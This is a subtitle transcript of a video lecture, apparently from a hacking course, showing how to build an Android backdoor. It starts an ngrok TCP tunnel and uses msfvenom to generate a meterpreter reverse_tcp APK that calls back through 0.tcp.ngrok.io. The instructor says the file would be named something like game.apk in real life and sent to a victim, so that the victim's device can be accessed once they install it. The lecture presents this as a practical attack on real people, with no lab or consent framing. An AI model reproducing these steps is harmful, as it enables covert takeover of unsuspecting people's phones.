1
00:00:00,300 --> 00:00:02,610
‫-: Hi, within this lecture

2
00:00:02,610 --> 00:00:04,800
‫we are going to be finally ready

3
00:00:04,800 --> 00:00:08,460
‫to create our backdoor for Android devices

4
00:00:08,460 --> 00:00:11,310
‫using this tunneling services.

5
00:00:11,310 --> 00:00:15,540
‫So if you go to documentation of this ngrok.com

6
00:00:15,540 --> 00:00:18,030
‫you will see a lot of usages

7
00:00:18,030 --> 00:00:22,530
‫and a lot of comments that you can use, you can leverage,

8
00:00:22,530 --> 00:00:25,380
‫in your own environment.

9
00:00:25,380 --> 00:00:29,790
‫As you can see, in order to create some kind of connection,

10
00:00:29,790 --> 00:00:34,290
‫all you have to do is just specify the connection type

11
00:00:34,290 --> 00:00:37,650
‫and the connection port that you want to use.

12
00:00:37,650 --> 00:00:40,050
‫I'm going to show you what you can do

13
00:00:40,050 --> 00:00:43,230
‫or what you have to do in order to make this work.

14
00:00:43,230 --> 00:00:46,440
‫Don't worry but if you want to use ngrok

15
00:00:46,440 --> 00:00:49,740
‫for some other spatial occasions later on

16
00:00:49,740 --> 00:00:52,800
‫make sure you read this documentation

17
00:00:52,800 --> 00:00:55,950
‫because it's very useful actually.

18
00:00:55,950 --> 00:00:59,820
‫For example, in here, they're trying to expose

19
00:00:59,820 --> 00:01:02,700
‫a web server on port 80

20
00:01:02,700 --> 00:01:05,580
‫of your local machine to the internet

21
00:01:05,580 --> 00:01:09,210
‫And that is what we have seen in the previous lecture

22
00:01:09,210 --> 00:01:13,800
‫when we try to start the web service of Apache.

23
00:01:13,800 --> 00:01:15,990
‫But that's not what we are going to do right now.

24
00:01:15,990 --> 00:01:20,520
‫We are going to use this for sending the connection

25
00:01:20,520 --> 00:01:23,310
‫from the Android to the ngrok.

26
00:01:23,310 --> 00:01:24,510
‫So in order to do that,

27
00:01:24,510 --> 00:01:26,700
‫of course we are going to use the same thing.

28
00:01:26,700 --> 00:01:31,170
‫I'm in my downloads folder one more time in my terminal

29
00:01:31,170 --> 00:01:36,170
‫and I'm writing ./ngrok TCP and a port number.

30
00:01:37,620 --> 00:01:41,160
‫So maybe you can think something like that.

31
00:01:41,160 --> 00:01:45,090
‫Yeah, you're talking about port a lot of times

32
00:01:45,090 --> 00:01:48,630
‫during this training, but you didn't explain

33
00:01:48,630 --> 00:01:51,690
‫what a port is and you're correct.

34
00:01:51,690 --> 00:01:55,590
‫So we are sending some requests and getting responses

35
00:01:55,590 --> 00:01:59,850
‫when we deal with internet operations in our daily life.

36
00:01:59,850 --> 00:02:04,050
‫So every connection like going to google.com

37
00:02:04,050 --> 00:02:07,620
‫or receiving that connection from Android phone

38
00:02:07,620 --> 00:02:10,470
‫requires some sort of a gate,

39
00:02:10,470 --> 00:02:14,280
‫some sort of a port to be processed on.

40
00:02:14,280 --> 00:02:19,103
‫So every connection uses its own specified gate,

41
00:02:20,460 --> 00:02:25,460
‫like 80 for HTTP requests or I don't know,

42
00:02:26,070 --> 00:02:31,020
‫22 for SSH requests and for mail requests

43
00:02:31,020 --> 00:02:33,300
‫we have a lot of different port

44
00:02:33,300 --> 00:02:37,050
‫for some kind of other special services,

45
00:02:37,050 --> 00:02:40,020
‫special connections, we have other ports.

46
00:02:40,020 --> 00:02:44,580
‫So we have some respective gates, respective port

47
00:02:44,580 --> 00:02:46,800
‫for different kind of connections.

48
00:02:46,800 --> 00:02:51,800
‫And firewalls actually try to observe these gates,

49
00:02:53,130 --> 00:02:58,130
‫observe this port, so that they won't be left open

50
00:02:58,560 --> 00:03:02,700
‫for any kind of incoming malicious connection.

51
00:03:02,700 --> 00:03:05,880
‫Okay? So we are going to use a port

52
00:03:05,880 --> 00:03:08,250
‫that no one else is using.

53
00:03:08,250 --> 00:03:12,540
‫Something like 4242 or any other thing like 5555.

54
00:03:13,500 --> 00:03:17,160
‫And if it doesn't work for you for some reason

55
00:03:17,160 --> 00:03:20,160
‫you may choose to use another port.

56
00:03:20,160 --> 00:03:24,210
‫For example, I'm going to write 4242 over here

57
00:03:24,210 --> 00:03:28,260
‫and since we do not have any kind of firewall

58
00:03:28,260 --> 00:03:31,260
‫in our Kali Linux, it should work fine.

59
00:03:31,260 --> 00:03:34,950
‫So I'm going to hit enter, and as you can see

60
00:03:34,950 --> 00:03:39,950
‫it started to work and we are not going to come across

61
00:03:40,410 --> 00:03:43,830
‫with kind of firewalls in Android as well.

62
00:03:43,830 --> 00:03:48,300
‫So most of the time this 4242 will work out for you

63
00:03:48,300 --> 00:03:51,873
‫but if it doesn't, just try 5555 or 6666 okay?

64
00:03:54,450 --> 00:03:58,380
‫So as you can see, it's now started

65
00:03:58,380 --> 00:04:02,340
‫and it's some kind of doing a forwarding operation

66
00:04:02,340 --> 00:04:05,160
‫which is what we are looking for.

67
00:04:05,160 --> 00:04:10,160
‫As you can see, we are forwarding this tcp.ngrok.io

68
00:04:11,400 --> 00:04:14,640
‫with this port to our localhost.

69
00:04:14,640 --> 00:04:17,340
‫So this address and this port

70
00:04:17,340 --> 00:04:21,030
‫would be different for you, maybe different for you.

71
00:04:21,030 --> 00:04:26,030
‫I have 17197 over here and in the localhost, of course

72
00:04:27,020 --> 00:04:32,020
‫we have our specified port over here, like 4242.

73
00:04:32,520 --> 00:04:34,890
‫But this will change for you.

74
00:04:34,890 --> 00:04:37,080
‫But we are going to use this.

75
00:04:37,080 --> 00:04:40,770
‫So I'm going to use this as a localhost

76
00:04:40,770 --> 00:04:45,120
‫and a local port in my MSFvenom. Because why?

77
00:04:45,120 --> 00:04:49,050
‫Because remember we want to direct the connection

78
00:04:49,050 --> 00:04:52,680
‫from the Android phone to the ngrok

79
00:04:52,680 --> 00:04:57,210
‫and then later on from the ngrok to our own localhost

80
00:04:57,210 --> 00:05:01,770
‫to our own Kali Linux machine using this service.

81
00:05:01,770 --> 00:05:05,730
‫So that is exactly what we are doing right now.

82
00:05:05,730 --> 00:05:08,940
‫So what I'm going to do, I'm going to give this

83
00:05:08,940 --> 00:05:13,589
‫as an input to L host and give the port

84
00:05:13,589 --> 00:05:17,340
‫as an input to the output in my MSFvenom.

85
00:05:17,340 --> 00:05:22,340
‫So you have to do exactly the same in order to succeed.

86
00:05:22,380 --> 00:05:24,960
‫So this would be different for you

87
00:05:24,960 --> 00:05:27,810
‫even the address would be different for you.

88
00:05:27,810 --> 00:05:31,950
‫So make sure you copy your own, not mine.

89
00:05:31,950 --> 00:05:34,950
‫So over here I'm going to use this

90
00:05:34,950 --> 00:05:39,700
‫and I'm going to use 1797 as a port

91
00:05:40,590 --> 00:05:42,810
‫and this will receive the information

92
00:05:42,810 --> 00:05:46,920
‫and forward it to me once it comes.

93
00:05:46,920 --> 00:05:49,050
‫So don't close this down

94
00:05:49,050 --> 00:05:53,880
‫just open a new tab from the file and say new tab, okay?

95
00:05:53,880 --> 00:05:57,960
‫Because if you close it down, the service will stop.

96
00:05:57,960 --> 00:06:02,960
‫So open a new tab and write the MSFvenom code comment

97
00:06:03,330 --> 00:06:05,460
‫that we have written before.

98
00:06:05,460 --> 00:06:08,730
‫So as a payload parameter, I'm going to specify

99
00:06:08,730 --> 00:06:13,730
‫Android meterpreter and then reverse TCP, okay?

100
00:06:15,130 --> 00:06:17,610
‫The reverse_TCP.

101
00:06:17,610 --> 00:06:22,260
‫And then later on we have to specify the L host

102
00:06:22,260 --> 00:06:24,660
‫and say equal to,

103
00:06:24,660 --> 00:06:29,660
‫and this will be equal to the 0.tcp.ngrok.io I believe.

104
00:06:32,670 --> 00:06:35,063
‫And the L port will be 17197.

105
00:06:39,750 --> 00:06:42,873
‫So I'm just going to copy and paste those.

106
00:06:43,800 --> 00:06:48,180
‫0.tcp.ngrok.io so it's easy, I can write that

107
00:06:48,180 --> 00:06:53,180
‫without forgetting I suppose 0.tcp.ngrok.io

108
00:06:56,040 --> 00:07:01,040
‫and then our port will be 17, let me see it, yeah, 17197.

109
00:07:06,960 --> 00:07:10,440
‫So 17197.

110
00:07:10,440 --> 00:07:13,410
‫Here we go, now we are okay.

111
00:07:13,410 --> 00:07:18,410
‫And then we specify where to put this payload,

112
00:07:18,720 --> 00:07:20,550
‫where to put this APK file

113
00:07:20,550 --> 00:07:23,970
‫that we have been trying to create.

114
00:07:23,970 --> 00:07:27,540
‫In order to do that, you can just write the results

115
00:07:27,540 --> 00:07:32,540
‫like -R and specify the folder that you want to put it,

116
00:07:33,090 --> 00:07:37,740
‫so that you can access it easily and you can forward it.

117
00:07:37,740 --> 00:07:41,940
‫So I'm going to say R, okay, with a capital R

118
00:07:41,940 --> 00:07:45,810
‫and say this greater sign, it means that

119
00:07:45,810 --> 00:07:50,810
‫just write the result into this folder, into this location.

120
00:07:51,960 --> 00:07:56,960
‫Okay? So R > /root/downloads or documents

121
00:07:59,610 --> 00:08:03,750
‫or any other folder that you may want to put this.

122
00:08:03,750 --> 00:08:07,440
‫So I'm going to say ngroktest.apk

123
00:08:07,440 --> 00:08:12,440
‫and I'm going to put it inside of my root folder directly.

124
00:08:12,570 --> 00:08:14,310
‫Of course, you are more than welcome

125
00:08:14,310 --> 00:08:17,160
‫to use another name for your APK,

126
00:08:17,160 --> 00:08:21,660
‫but don't forget to specify that APK extension

127
00:08:21,660 --> 00:08:23,340
‫at the end of this.

128
00:08:23,340 --> 00:08:25,380
‫I'm just going to call this test

129
00:08:25,380 --> 00:08:27,990
‫because we are testing it, okay?

130
00:08:27,990 --> 00:08:30,960
‫In real life example, it would be something like

131
00:08:30,960 --> 00:08:35,597
‫game.apk or I don't know, supercoolapplication.apk

132
00:08:37,157 --> 00:08:40,770
‫'cause you are going to send it to victim next.

133
00:08:40,770 --> 00:08:44,430
‫So here you go, I believe it's now created for us.

134
00:08:44,430 --> 00:08:49,430
‫Let me minimize this and let me go to root folder.

135
00:08:50,010 --> 00:08:53,977
‫And here we go, we see the ngroktest.apk.

136
00:08:55,500 --> 00:08:57,660
‫So this is the exact file

137
00:08:57,660 --> 00:09:01,110
‫that we are going to send to the victim.

138
00:09:01,110 --> 00:09:04,830
‫And once the victim installs this

139
00:09:04,830 --> 00:09:08,730
‫we're going to get access to their own device.

140
00:09:08,730 --> 00:09:11,043
‫Let's do that in the next lecture.